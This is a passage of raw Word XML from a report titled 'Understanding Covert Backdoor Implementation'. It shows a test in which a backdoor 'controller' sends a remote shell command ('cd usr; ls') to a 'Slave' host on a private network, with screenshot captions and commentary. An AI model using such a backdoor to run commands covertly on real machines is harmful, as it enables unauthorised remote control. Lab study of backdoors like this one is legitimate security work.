                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png" descr="Screenshot from 2014-10-04 15:22:54.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2692727" cy="3605213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Second Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">controller -s 192.168.0.15 -p 10022 -d 192.168.0.14 -q 10022 -c “cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot from Slave (left) and Controller (right):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2754924" cy="5081588"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="image37.png" descr="Screenshot from 2014-10-04 15:29:37.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png" descr="Screenshot from 2014-10-04 15:29:37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2754924" cy="5081588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2671763" cy="4071727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="image84.png" descr="Screenshot from 2014-10-04 15:30:08.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image84.png" descr="Screenshot from 2014-10-04 15:30:08.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2671763" cy="4071727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As we can see, there are remnants of the previous transaction on our Slave’s terminal, but we see no termination of the application. This ensures that the application continues to run after each transaction. Conversely, our Controller terminates after every transaction. We can see how we had to enter the command twice. Furthermore, note that our second command to traverse into “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” directory is a relative command, not absolute! This ensures that it is dependent on our previous command and it lists exactly what we would expect.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C60197" w:rsidSect="00634A4B">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4A50" w:rsidRDefault="00C24A50">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C24A50" w:rsidRDefault="00C24A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017" w:rsidRPr="00634A4B" w:rsidRDefault="00F90017">
    <w:pPr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DC7715">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>33</w:t>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00634A4B">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DC7715">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>37</w:t>
    </w:r>
    <w:r w:rsidRPr="00634A4B">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4A50" w:rsidRDefault="00C24A50">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C24A50" w:rsidRDefault="00C24A5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55EF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39DE5B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A735641"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="865877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F4D43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="893C61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7A46B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC80F5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D792CA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4BC5C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48565946"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="240A20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5FAF155E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8804E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0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>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60197"/>
    <w:rsid w:val="002B4423"/>
    <w:rsid w:val="00634A4B"/>
    <w:rsid w:val="006E52F9"/>
    <w:rsid w:val="007255E2"/>
    <w:rsid w:val="0098471F"/>
    <w:rsid w:val="009B3882"/>
    <w:rsid w:val="00C24A50"/>
    <w:rsid w:val="00C60197"/>
    <w:rsid w:val="00D04825"/>
    <w:rsid w:val="00DC7715"/>
    <w:rsid w:val="00F900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027E786-6025-4EF9-9402-15D32DE87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sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading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sz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paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00634A4B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00634A4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00634A4B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00634A4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F90017"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007255E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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OC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007255E2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007255E2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007255E2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007255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190268">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="16135874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19778-9F21-4277-A83F-09CD56046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5928</Words>
  <Characters>33796</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Understanding Covert Backdoor Implementation.docx</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39645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Covert Backdoor Implementation.docx</dc:title>
  <dc:creator>David Tran</dc:creator>
  <cp:lastModifiedBy>David Tran</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2014-12-08T02:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-08T02:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-12-08T02:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>